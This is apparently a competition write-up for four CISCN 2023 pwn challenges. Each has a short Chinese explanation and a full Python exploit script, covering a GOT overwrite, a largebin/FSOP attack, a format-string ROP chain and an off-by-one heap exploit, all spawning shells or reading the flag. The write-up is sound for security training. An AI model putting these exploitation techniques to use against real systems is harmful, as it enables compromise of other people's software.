CISCN东北赛区-2023-pwn-all

Novice Challenge

漏洞利用

改strlen的got表

EXP

#!/usr/bin/env python3
from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF("./libc.so.6")
    gift[libc] = libc

sla('challenge!','root')
sla('luck!','17')
lb = recv_current_libc_addr(0x3fc10f,0x10)
libc.address = lb
leak_ex2(lb)
off = str(0xffffffff+0x10)
sla('index>>\n',off)
sa('input>>',flat(
    {
        0:'/bin/sh;',
        0x1c:p32(0xffffff78)
    }
))
sa('bye',flat(
    libc.sym.system
)[:-4])

ia()

Quadra Two Times

漏洞利用

经典菜单，但是每个功能只能用两次，利用scanf函数让UB中的chunk进入Largebin即可。但是比赛的时候很蛋疼，本地打通了，远程没打通，我还以为是payload字节问题，搞了3个小时，换了4种写法...然后发现pwncli加载libc有点小问题，倒数8分钟极限出，拿到二血，但后果是导致比赛时没时间做剩下两题。。。

EXP

#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 09:10:39
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug



def cmd(i, prompt='our choice >> '):
    sla(prompt, str(i))

def add(sz):
    cmd('1')
    sla('size',str(sz))
    #......

def edit(i,cont):
    cmd('3')
    sla('>> ',str(i))
    sa('>>',cont)
    #......

def show(i):
    cmd('4')
    sla('>> ',str(i))
    #......

def dele(i):
    cmd('2')
    sla('>> ',str(i))
    #......
add(0x420)
add(0x418)
dele(0)
cmd('1'*0x450)
dele(1)
show(0)
lb = recv_current_libc_addr(2018184+0x448,0x100)
leak_ex2(lb)
libc.address = lb
edit(0,flat(
    {
        0:[
            lb + 0x1ecfd0,lb + 0x1ecfd0,0,
            libc.sym._IO_2_1_stderr_ + 0x68 - 0x20
        ]
    }
))
cmd('1'*0x450)
show(0)
ru('Content: ')
leak_heap = u64_ex(r(6)+b'\x00'*2)
leak_ex2(leak_heap)
CG.set_find_area(0,1)
rop_pd = flat(
    {
        0x0:[
            CG.mprotect_chain(leak_heap&(~0xfff)),
            CG.ret(),
            leak_heap + 0x1a0
        ]
    }
)
mgg1 = libc.search(asm("mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]")).__next__()
mgg2 = libc.search(asm("mov rsp, rdx; ret")).__next__()
mgg3 = libc.search(asm("add rsp, 0x30; mov rax, r12; pop r12; ret")).__next__()

fp = IO_FILE_plus_struct()

fsop = fp.house_of_Lys_getshell_when_exit_under_2_37(0xdeadbeef,libc.sym._IO_wfile_jumps+0x300,leak_heap)[0x10:]
data = payload_replace(fsop,{
        0x38-0x10:mgg1,
        0xa0-0x10:0xdeadbeef,
        0x48-0x10:leak_heap + 0x100
    }
)
edit(1,flat(
    {
        0:[
            fp.house_of_Lys_stack_pivoting_when_exit_between_2_30_and_2_36(leak_heap,libc.sym._IO_wfile_jumps+0x300,rop_pd,mgg1,mgg2,mgg3)[0x10:]
        ],
        0x190:asm(shellcraft.cat('/flag'))

    }
))
cmd('5')
leak_ex2(mgg1)

ia()


'''
mov rbp, qword ptr [rdi + 0x48]; 
mov rax, qword ptr [rbp + 0x18]; 
lea r13, [rbp + 0x10]; 
mov dword ptr [rbp + 0x10], 0; 
mov rdi, r13; 
call qword ptr [rax + 0x28];'''

'''
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x04 0xc000003e  if (A != ARCH_X86_64) goto 0006
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0005
 0004: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0005: 0x25 0x00 0x01 0x00000110  if (A <= 0x110) goto 0007
 0006: 0x06 0x00 0x00 0x00000000  return KILL
 0007: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0009
 0008: 0x06 0x00 0x00 0x00000000  return KILL
 0009: 0x15 0x00 0x05 0x00000000  if (A != read) goto 0015
 0010: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # read(fd, buf, count)
 0011: 0x15 0x00 0x04 0x00000000  if (A != 0x0) goto 0016
 0012: 0x20 0x00 0x00 0x00000010  A = fd # read(fd, buf, count)
 0013: 0x15 0x00 0x02 0x00000000  if (A != 0x0) goto 0016
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0017
 0016: 0x06 0x00 0x00 0x00000000  return KILL
 0017: 0x06 0x00 0x00 0x7fff0000  return ALLOW

allow:exit_group
ban:openat
'''

repeater

漏洞利用

格式化字符串改链在栈上写rop链后，利用ret2csu的部分gadget劫持printf函数结束时的程序流到rop链

EXP

	#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 09:17:17
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF("./libc-2.31.so")
    gift[libc] = libc

sa('length:',str(0x400))
pd = flat(
    {
        0:'%11$p-%13$p'
    }
)

sa('the content: ',pd)
lb = int(ru('-')[:-1],16) - 0x24083
libc.address = lb
stack = int(ru('P')[:-1],16) 
attack_stack = stack -0xe8
ogg = 0xe3b01 + lb
leak_ex2(lb)
leak_ex2(attack_stack)
attack_libc = lb + 0x1ec040

val_i_addr = stack - 0x30 -0xe8
leak_ex2(attack_stack)

def fmt_attack(va,attack_stack):
  sa('length',str(0x400))
  pd = flat(
    {
        0:['%' + str(attack_stack&0xffff) + 'c' + '%28$hn\x00']
    }
)
  sa('the content: ',pd)
  sa('length:',str(0x400))
  pd = flat(
    {
        0:['%' + str(va&0xff) + 'c' + '%41$hhn\x00']
    }
)
  sa('the content: ',pd)
  sa('length:',str(0x400))
  pd = flat(
    {
        0:['%' + str(val_i_addr&0xffff) + 'c' + '%28$hn\x00']
    }
)
  sa('the content: ',pd)
  sa('length:',str(0x400))
  pd = flat(
    {
        0:['%41$hhn\x00']
    }
)
  sa('the content: ',pd)
  
sys_addr = libc.sym.system
CG.set_find_area(0,1)
sh = CG.bin_sh()
pop_rdi = CG.pop_rdi_ret()
at_addr =attack_stack
leak_ex2(pop_rdi)

for i in range(6):
   fmt_attack(pop_rdi,attack_stack)
   pop_rdi = pop_rdi>>8
   attack_stack = attack_stack + 1
attack_stack = at_addr + 0x8
S()
for i in range(6):
   fmt_attack(sh,attack_stack)
   sh = sh>>8
   attack_stack = attack_stack + 1
attack_stack = at_addr + 0x10
for i in range(6):
   fmt_attack(sys_addr,attack_stack)
   sys_addr = sys_addr>>8
   attack_stack = attack_stack + 1

attack_ret = stack - 0x38 - 0xe8
leak_ex2(attack_ret)

sa('length:',str(0x400))
pd = flat(
  {
      0:['%' + str(attack_ret&0xff) + 'c' + '%28$hhn\x00']
  }
)

sa('the content: ',pd)
sa('length:',str(0x400))
pd = flat(
  {
      0:['%' + str(0xea) + 'c' + '%41$hhn\x00']
  }
)
sa('the content: ',pd)

ia()
'''
.text:00000000000013E6 48 83 C4 08                   add     rsp, 8
.text:00000000000013EA 5B                            pop     rbx
.text:00000000000013EB 5D                            pop     rbp
.text:00000000000013EC 41 5C                         pop     r12
.text:00000000000013EE 41 5D                         pop     r13
.text:00000000000013F0 41 5E                         pop     r14
.text:00000000000013F2 41 5F                         pop     r15
.text:00000000000013F4 C3                            retn
'''
'''
00:0000│ rsp 0x7ffec24b4808 —▸ 0x560ef5357369 ◂— jmp    0x560ef535736f
01:0008│     0x7ffec24b4810 ◂— 0x40000000000
02:0010│     0x7ffec24b4818 —▸ 0x560ef6a072a0 ◂— '%11$p-%13$p'
03:0018│     0x7ffec24b4820 ◂— 0x34323031 /* '1024' */
04:0020│     0x7ffec24b4828 ◂— 0xebcc69e4c0ca1a00
05:0028│ rbp 0x7ffec24b4830 ◂— 0x0
06:0030│     0x7ffec24b4838 —▸ 0x7f84688f9083 (__libc_start_main+243) ◂— mov    edi, eax
07:0038│     0x7ffec24b4840 ◂— 0x100000060 /* '`' */
08:0040│     0x7ffec24b4848 —▸ 0x7ffec24b4928 —▸ 0x7ffec24b50e8 ◂— 0x61682f656d6f682f ('/home/ha')
09:0048│     0x7ffec24b4850 ◂— 0x168abd7a0
0a:0050│     0x7ffec24b4858 —▸ 0x560ef535727f ◂— endbr64 
0b:0058│     0x7ffec24b4860 —▸ 0x560ef5357390 ◂— endbr64 
0c:0060│     0x7ffec24b4868 ◂— 0xb4bb42b1882ac453
0d:0068│     0x7ffec24b4870 —▸ 0x560ef5357140 ◂— endbr64 
0e:0070│     0x7ffec24b4878 —▸ 0x7ffec24b4920 ◂— 0x1
0f:0078│     0x7ffec24b4880 ◂— 0x0
10:0080│     0x7ffec24b4888 ◂— 0x0
11:0088│     0x7ffec24b4890 ◂— 0x4b46c62718aac453
12:0090│     0x7ffec24b4898 ◂— 0x4bb393aea844c453

'''

your_note

漏洞利用

off by one改打size然后leak libc，后面都是正常操作

EXP

#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 10:29:05
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF("./libc-2.23.so")
    gift[libc] = libc


def cmd(i, prompt='5.go out for happy\n'):
    sla(prompt, str(i))

def add(i,sz,cont='/bin/sh\x00'):
    cmd('1')
    sla('index?',str(i))
    sla('size?',str(sz))
    sla('content?',cont)
    #......

def edit(i,cont):
    cmd('4')
    sla('hich index to edit?\n',str(i)) 
    sla('what do you want to rewrite it ?',cont)
    #......

def show(i):
    cmd('3')
    sla('index?',str(i)) 
    #......

def dele(i):
    cmd('2')
    sla('which one?',str(i))   
    #......

add(0,0xf8)
add(1,0x3f8)
add(2,0xf0-0x10)    #0x400 + 0xf0
add(3,0xf8)
add(4,0x3f8)
add(5,0x10)
add(6,0x10)
edit(0,flat(
    {
        0xf8:p8(0xf1)
    }
))
dele(1)

edit(3,flat(
    {
        0xf0:[
            0x100+0x4f0,
            p8(0x20)
        ]
    }
))
#unlink
dele(4)
add(1,0x3f8)
dele(6)
add(4,0x100,'a'*8)
add(6,0x100)
#leak a libc
show(4)
#use "^0xca"
ru('171^-^171^-^171^-^171^-^171^-^171^-^171^-^171^-^')

leak_libc = b''
for i in range(6):
    data_ = int(ru('^-^')[:-3])
    leak_ex2(data_)
    data_ = (data_^0xca)&0xff
    leak_ex2(data_)
    leak_libc += p8(data_)
leak_libc = u64_ex(leak_libc)
leak_ex2(leak_libc)
lb = leak_libc - 0x3ec10a
libc.address = lb
leak_ex2(lb)
#hijack tcachebin fd
dele(6)
dele(4)
show(2)
#0x22
leak_heap = b''
for i in range(6):
    data_ = int(ru('^-^')[:-3])
    leak_ex2(data_)
    data_ = (data_^0x22)&0xff
    leak_ex2(data_)
    leak_heap += p8(data_)
leak_heap = u64_ex(leak_heap)
attack_heap = leak_heap - 0x620 + 0x10
edit(2,flat(
    {
        0:[
            libc.sym.__free_hook
        ]
    }
))

#getshell
add(6,0x100)
add(4,0x100,p64_ex(0xfbad2887))
fp = IO_FILE_plus_struct()
CG.set_find_area(0,1)

rop_chain = flat(
    {
        0:[
            CG.mprotect_chain(attack_heap&~(0xfff)),
            CG.ret(),
            attack_heap+0xc0,
        ]
    }
)

edit(4,flat({
    0x0:[
        libc.sym.setcontext + 53
    ],
},filler = '\x00'
))
leak_ex2(leak_heap)
edit(0,flat({
    0xa0:[
        attack_heap + 0x20,
        CG.ret(),
    ],
    0x20:rop_chain,
    0xc0:ShellcodeMall.amd64.cat_flag,
},filler = '\x00'
))
S()
dele(0)



ia()

'''
  0x7f994b326085 <setcontext+53>:	mov    rsp,QWORD PTR [rdi+0xa0]
   0x7f994b32608c <setcontext+60>:	mov    rbx,QWORD PTR [rdi+0x80]
   0x7f994b326093 <setcontext+67>:	mov    rbp,QWORD PTR [rdi+0x78]
   0x7f994b326097 <setcontext+71>:	mov    r12,QWORD PTR [rdi+0x48]
   0x7f994b32609b <setcontext+75>:	mov    r13,QWORD PTR [rdi+0x50]
   0x7f994b32609f <setcontext+79>:	mov    r14,QWORD PTR [rdi+0x58]
   0x7f994b3260a3 <setcontext+83>:	mov    r15,QWORD PTR [rdi+0x60]
   0x7f994b3260a7 <setcontext+87>:	mov    rcx,QWORD PTR [rdi+0xa8]
   0x7f994b3260ae <setcontext+94>:	push   rcx
   0x7f994b3260af <setcontext+95>:	mov    rsi,QWORD PTR [rdi+0x70]
pwndbg> 
   0x7f994b3260b3 <setcontext+99>:	mov    rdx,QWORD PTR [rdi+0x88]
   0x7f994b3260ba <setcontext+106>:	mov    rcx,QWORD PTR [rdi+0x98]
   0x7f994b3260c1 <setcontext+113>:	mov    r8,QWORD PTR [rdi+0x28]
   0x7f994b3260c5 <setcontext+117>:	mov    r9,QWORD PTR [rdi+0x30]
   0x7f994b3260c9 <setcontext+121>:	mov    rdi,QWORD PTR [rdi+0x68]
   0x7f994b3260cd <setcontext+125>:	xor    eax,eax
   0x7f994b3260cf <setcontext+127>:	ret    

'''